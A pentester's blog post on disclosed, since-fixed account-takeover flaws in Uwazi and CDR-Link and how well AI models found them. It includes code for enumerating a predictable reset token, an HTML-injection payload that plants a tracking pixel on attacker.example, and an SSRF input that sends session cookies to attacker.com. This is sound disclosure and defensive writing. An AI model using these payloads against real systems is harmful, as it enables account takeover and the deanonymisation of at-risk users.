What AI Found and What It Missed

Yesterday, the second Open Technology Fund pentest I have done was published. That means I can finally share some results of my exploration at the intersection of AI and security, namely using AI for pentesting!

Background

First, a brief background. During 2024 I conducted two pentests (manually, no AI) of open source applications via Open Technology Fund. The first one was Uwazi (report available), a security-critical system for managing eyewitness videos, testimonies, and other human rights documentation for human rights defenders, journalists, activists, and researchers. Uwazi had been pentested three times previously.

One of the discovered vulnerabilities was a zero-click account takeover via a password reset flaw. The fundamental issue was that the reset token was generated by hashing the email and the current Unix timestamp, which meant that the attacker only had to try resetting the password with every possible timestamp between sending the password reset request and receiving the response from the server. In practice this means a few hundred attempts, which takes a few seconds. When the right token value was tried, the attacker could set the password of the account to whatever they wanted.
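To make the search space concrete, here is a minimal sketch of the enumeration. It is not Uwazi's code: the hash function (SHA-256), the way the email and timestamp are concatenated, and the millisecond resolution are all my assumptions for illustration, and the function names are hypothetical.

```typescript
import { createHash, randomBytes } from "node:crypto";

// ASSUMPTION: token = SHA-256(email + timestamp in milliseconds).
// The real hash function and input format are not shown in this post.
function predictableToken(email: string, timestampMs: number): string {
  return createHash("sha256").update(email + timestampMs).digest("hex");
}

// Every token the server could have generated between the moment the
// attacker sent the reset request and the moment the response arrived.
function candidateTokens(email: string, sentAtMs: number, receivedAtMs: number): string[] {
  const candidates: string[] = [];
  for (let t = sentAtMs; t <= receivedAtMs; t++) {
    candidates.push(predictableToken(email, t));
  }
  return candidates;
}

// Simulated server: it generates the token at some instant inside the window.
const email = "victim@example.org";
const sentAt = 1700000000000;
const receivedAt = sentAt + 300; // a 300 ms round trip
const serverToken = predictableToken(email, sentAt + 137);

const guesses = candidateTokens(email, sentAt, receivedAt);
console.log(guesses.length); // 301
console.log(guesses.includes(serverToken)); // true

// For contrast: a token drawn from a CSPRNG has no such search window.
const unpredictableToken = randomBytes(32).toString("hex");
console.log(unpredictableToken.length); // 64
```

The attacker never needs to see the email. Knowing the victim's address and roughly when the request was processed is enough to rebuild the token.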

The vulnerable code. Note line 291 where the token is generated

Schematic showing the idea

The attack in action: the account takeover via password reset

The second system we pentested was CDR-Link (report available), a secure, open source help desk application for organizations that run digital security help desks for communities facing authoritarian censorship and surveillance. The help desks run via Signal, Telegram, and WhatsApp channels, and provide organizations with a dashboard from which they can streamline responses to support requests. Later in the post, I will dig into the most critical vulnerability we found: a zero-click account takeover via SSRF.

Disclosure: The vulnerability that I missed

Part of my exploration into using AI for security has focused on vulnerability research, or pentesting. Specifically, I have been interested in what the limit is for frontier AI models in discovering vulnerabilities in code. To really dig into it, I decided to scan open source applications that I have pentested (specifically the commit I pentested), since I know the code and what vulnerabilities they hold. One of the systems was Uwazi.

I scanned the system using a pentesting harness I built, and it did find most vulnerabilities from the pentest. I must say, I was surprised and really impressed! I looked specifically at the findings related to the password reset functionality, and it had found the same critical issue with the predictable reset token. But on top of that, it had discovered one more critical issue.

Technical details

Looking back at the code for the password reset, the function is called with a domain variable that flows into conformRecoverText().

Uwazi password reset again

In conformRecoverText(), it is used to create the URL in the email that gets sent to the user whose password is being reset.

Uwazi password reset email generation

This means that if domain is attacker controlled, they can add their own domain instead of the Uwazi one. If the user clicks the link in the email, the reset token gets sent to the attacker server.

But, surely this variable is defined from an environment variable or something? It turns out, if you trace the calls backwards, it comes from the host header in the request.

Domain gets created from the host header

This means an attacker could simply send a password reset request for another user with an attacker-controlled domain in the Host header. The victim would receive the legitimate-looking Uwazi email, but clicking the link would compromise their account.
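The pattern can be sketched as follows. This is a hypothetical stand-in, not Uwazi's actual code: the request type, the URL path, the configured host name, and the function names are all assumptions made for illustration.

```typescript
// Minimal request shape; real frameworks expose headers in a similar way.
type IncomingRequest = { headers: Record<string, string | undefined> };

// ASSUMPTION: a host name the operator sets in server-side configuration.
const CONFIGURED_HOST = "uwazi.example.org";

// Hypothetical link builder; the real route is not shown in this post.
function resetLink(host: string, token: string): string {
  return `https://${host}/reset-password/${token}`;
}

// Vulnerable pattern: the Host header is sent by the client, so whoever
// triggers the reset decides where the emailed link points.
function vulnerableResetLink(req: IncomingRequest, token: string): string {
  return resetLink(req.headers.host ?? CONFIGURED_HOST, token);
}

// Safer pattern: ignore the request and use the configured host.
function saferResetLink(_req: IncomingRequest, token: string): string {
  return resetLink(CONFIGURED_HOST, token);
}

const forged: IncomingRequest = { headers: { host: "attacker.example" } };
const vulnerable = vulnerableResetLink(forged, "abc123");
const safer = saferResetLink(forged, "abc123");

console.log(new URL(vulnerable).hostname); // attacker.example
console.log(new URL(safer).hostname); // uwazi.example.org
```

Taking the host from configuration is one common mitigation. Validating the header against an allowlist of known host names is another.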

Digging further into it, it turns out the same pattern existed for the login lockout functionality. Making six failed login attempts (wrong password or MFA) locks the account and sends an email to the owner with a link to unlock their account.

Account lockout email sender function. Note HTML

This is more or less the same thing, with the attacker-controlled domain variable getting embedded in the email. There is one important difference though: this email is sent as HTML content. That means we can use the domain variable to inject HTML, which opens up more attacks. More importantly, it allows us to add a tracking pixel which fires as soon as the victim opens the email, leaking their IP address and user agent. Since Uwazi is used by whistleblowers and human rights advocates in hostile environments, anything that helps an adversary identify the users is critical.
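A minimal sketch of the injection, assuming a template that interpolates the domain straight into an href attribute. The template, the path, and the payload are hypothetical and only illustrate the class of bug. Escaping is shown as one possible mitigation for the HTML injection; it does not address trusting the Host header in the first place.

```typescript
// Hypothetical stand-in for the lockout email template; not Uwazi's code.
function lockoutEmailHtml(domain: string, code: string): string {
  return `<p>Your account is locked. <a href="https://${domain}/unlock/${code}">Unlock it</a></p>`;
}

// Escape the characters that let a value break out of an HTML attribute.
function escapeHtml(value: string): string {
  return value
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// A header value that closes the href and the <a> tag, then appends a
// remote image that is fetched when the email is opened.
const maliciousHost = `x"></a><img src="https://attacker.example/pixel.png"><a href="`;

const injected = lockoutEmailHtml(maliciousHost, "c0de");
const escaped = lockoutEmailHtml(escapeHtml(maliciousHost), "c0de");

console.log(injected.includes("<img")); // true
console.log(escaped.includes("<img")); // false
```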

Summary

Two host header injections were discovered that allow an attacker to send emails containing malicious content. One allows overwriting the domain of the password reset URL, which contains the password reset token. The other allows injecting arbitrary HTML which is rendered when the user opens the email (email clients typically do not execute JavaScript, so no XSS), which could help an adversary deanonymize a user.

This is something we, and pentesters before us, missed when pentesting the application. Yet the vulnerabilities themselves are not very complex, which raises the question: why did we miss them?

As a pentester, you have limited time so you can’t dig into everything. You must make educated guesses on where to best spend your time. Speaking for myself, the simple reason I missed this is that I tacitly assumed that the domain variable did not originate from the user. Had the variable been named host instead, for example, I am sure it would have triggered any pentester’s spider sense.

Disclosure process

I reached out to Uwazi and disclosed the vulnerabilities on the 17th of March. They swiftly addressed the issues and graciously gave me permission to disclose the vulnerabilities. A big kudos to the team for their speed and transparency.

The vulnerability that AI missed

So is that it? AI is simply better at finding vulnerabilities than humans and we should spend our time doing something else? I kept scanning code, trying to learn more about the limits of AI. I tried scanning CDR-Link, another open source project I had pentested (report available). One of the vulnerabilities we found was a zero-click account takeover via SSRF.

Technical details

The CDR-Link system utilizes another system, Zammad, for some of its functionality. In practice, if a user sent a request to https://cdr-link.com/zammad/hello, it would be passed along to http://zammad-nginx:8080/hello internally. So to generalize, we have the pattern https://cdr-link.com/zammad{INPUT} which the server sends to http://zammad-nginx:8080{INPUT}.

Code in middleware.ts that rewrites the URL. The rewriteURL() function simply replaces the linkBaseURL with the zammadURL

Note that the headers are passed along to the rewriteURL() function. That is because the user needs to be authenticated in the Zammad system, too, so headers including session cookies are added to the request. Also note that the attacker controls more than just the path; there’s no slash between the port and {INPUT}. Had the rewrite produced http://zammad-nginx:8080/{INPUT} instead, only the path would be attacker-controlled, and this wouldn’t be exploitable. But because it produces http://zammad-nginx:8080{INPUT}, the attacker can inject characters that change the host itself. The attacker can abuse this by sending the request:

https://cdr-link.com/zammad@attacker.com

which will get rewritten to http://zammad-nginx:8080@attacker.com. In that URL, everything before the @ is parsed as basic authentication credentials, so it is treated as a request to attacker.com. Ergo, this is an SSRF. If we were to convince a user to click this link, their session cookies would be sent to the attacker. In the test, we found an HTML injection in the ticket creation, allowing the injection of an iframe so that the victim’s browser would send the request when they open the ticket, so no click was necessary.
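The parsing behaviour can be checked with the standard URL class. The sketch below uses the example host names from this post and a simplified rewriteURL() based on the string replacement described above. The real function also handles headers, which are omitted here. rewriteURLStrict() is a hypothetical stricter variant for comparison, not the fix the project shipped.

```typescript
// Example values from this post.
const linkBaseURL = "https://cdr-link.com";
const zammadURL = "http://zammad-nginx:8080";

// Simplified rewrite: swap the public prefix for the internal one.
function rewriteURL(requestUrl: string): string {
  return requestUrl.replace(linkBaseURL + "/zammad", zammadURL);
}

// Hypothetical stricter variant: only rewrite when "/zammad" is a whole
// path segment, and build the target from the parsed path and query.
function rewriteURLStrict(requestUrl: string): string | null {
  const { pathname, search } = new URL(requestUrl);
  if (pathname !== "/zammad" && !pathname.startsWith("/zammad/")) return null;
  return zammadURL + (pathname.slice("/zammad".length) || "/") + search;
}

// True when the string is accepted by the URL parser.
function parses(url: string): boolean {
  try {
    new URL(url);
    return true;
  } catch {
    return false;
  }
}

const benign = new URL(rewriteURL("https://cdr-link.com/zammad/hello"));
const hostile = new URL(rewriteURL("https://cdr-link.com/zammad@attacker.com"));

console.log(benign.host); // zammad-nginx:8080
console.log(hostile.hostname); // attacker.com
console.log(hostile.username, hostile.password); // zammad-nginx 8080

// Plain letters after the port produce an invalid URL, not a new host.
console.log(parses(rewriteURL("https://cdr-link.com/zammadxyz"))); // false

console.log(rewriteURLStrict("https://cdr-link.com/zammad@attacker.com")); // null
console.log(rewriteURLStrict("https://cdr-link.com/zammad/hello")); // http://zammad-nginx:8080/hello
```

The difference between the xyz and @attacker.com inputs matters: the first only breaks the URL, while the second turns the intended host into credentials and hands control of the destination to the attacker.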

Attempts with AI

When I scanned CDR-Link with the pentesting harness, it didn’t find the rewrite vulnerability. At first, I suspected the harness was to blame, so I decided to manually guide an agent to the vulnerability to see what data it needed to find it.

Claude Sonnet 4.6

I tried with Claude Sonnet 4.6. I ran it inside the CDR-Link repo and asked it to audit the repo for vulnerabilities. I gave it a series of hints to guide it to the vulnerability:

Audit the repo, start with the middleware file

There is another critical issue in the middleware file

Look at lines 41-42 (vulnerable lines of code)

It has to do with /zammadxyz appending xyz to the destination URL

At the end of all that, Sonnet still couldn’t find the vulnerability. It listed a bunch of other vulnerabilities, most of which were either true but intended, like running the application in SETUP MODE disabling authentication, or plain hallucinations. The one real, interesting vulnerability it found was a legitimate host header injection (once again!), but that issue had already been closed by the same fix that resolved the rewrite vulnerability I covered earlier.

So in short, Sonnet 4.6 failed to find the vulnerability despite being given absurd levels of guidance, far surpassing what any harness could reasonably do.

Claude Opus 4.7

During my wait to disclose, Claude Opus 4.7 was released. I gave it a go at the same vulnerability, gradually ramping up the hints in the same way:

Audit the repo, start with the middleware file

Here it actually flags the issue but fails to see the security impact:

H2. path.startsWith(...) prefix checks are over-broad

  Where: middleware.ts:41, 43, 97, 101.

  What:
  - startsWith("/zammad") matches /zammadxyz — the subsequent
  request.url.replace(linkBaseURL + "/zammad", zammadURL) then produces
  malformed hostnames (e.g. http://zammad-nginx:8080xyz/...) that new URL() will
   throw on. 500s, not exploit, but brittle.
  - zammadPaths.some(p => pathname.startsWith(p)) matches /assetsfoo, /cablefoo,
   etc., all forwarded to Zammad.
  - startsWith("/login") matches /login-anything and permits it unauthenticated.
  - startsWith("/admin") is OK as-is, but note it only protects the literal
  /admin prefix — admin functionality placed under any other path has no
  middleware protection.
  

There is another critical issue in the middleware file

It found that the application was vulnerable to CVE-2025-29927 which was true, but unsurprising since I was scanning a commit from 2024. The issue had been fixed, so the current version of the application did not have this vulnerability.

Look at the redirects

It flagged the host header injection that Sonnet also found.

The rewrites have another issue, look deeper

It basically got stuck and listed everything it had “ruled out”. Among them, it mentioned the /zammadxyz issue, and asked for further hints.

Dig into the /zammadxyz

After much guidance, Opus finds the vulnerability!

And it finally found the vulnerability! To its credit, once it found the vulnerability, it accurately explained the impact and recommended a remediation.

So Opus 4.7 did find the issue, but originally ruled it out despite repeated prompts to dig deeper. It had to be given absurd levels of guidance to succeed. I am sceptical that a human or harness that did not already know about the vulnerability would be able to provide that.

Full chat logs are available on GitHub: Sonnet, Opus.

Conclusion

Based on my exploration, I think it is clear that AI can provide a lot of value when it comes to discovering vulnerabilities. It can find issues that pentesters typically miss because of assumptions made under time pressure.

However, current frontier models are not good enough to replace humans. Instead, I think AI-assisted pentesting is the way to go.

There are some challenges to solve:

Pentesting inherently deals with secret information, such as closed source code and of course the vulnerabilities themselves. We need to use AI in a way that doesn’t compromise the customer. That can be done either by running open source AI models on infrastructure we own, or by signing an agreement with an AI vendor that provides guarantees and having the customers approve of us sending their data to that vendor.

In the ideal world, we would grow confident in the ability of the AI and harness to find certain classes of vulnerabilities, and notice it lacking in other areas. If one could identify these with some consistency, the human could spend most of their time in the areas where the AI performs poorly and just do a quick pass over the areas where the AI excels. If that is possible, huge gains in speed would be possible while preserving or raising the confidence in the findings.

I think the possible gains brought by AI warrant solving the challenges above. It will be really interesting to see how pentesting firms do so.

Thanks

A big thank you to Uwazi for allowing me to disclose the vulnerability! Having dealt with them, I can say they are a super professional team who really prioritize securing their systems. Truly a delight to work with.

My friends at Assured also deserve a big thank you for giving me the opportunity to pentest these systems in the first place.

Dennis Dubrefjord
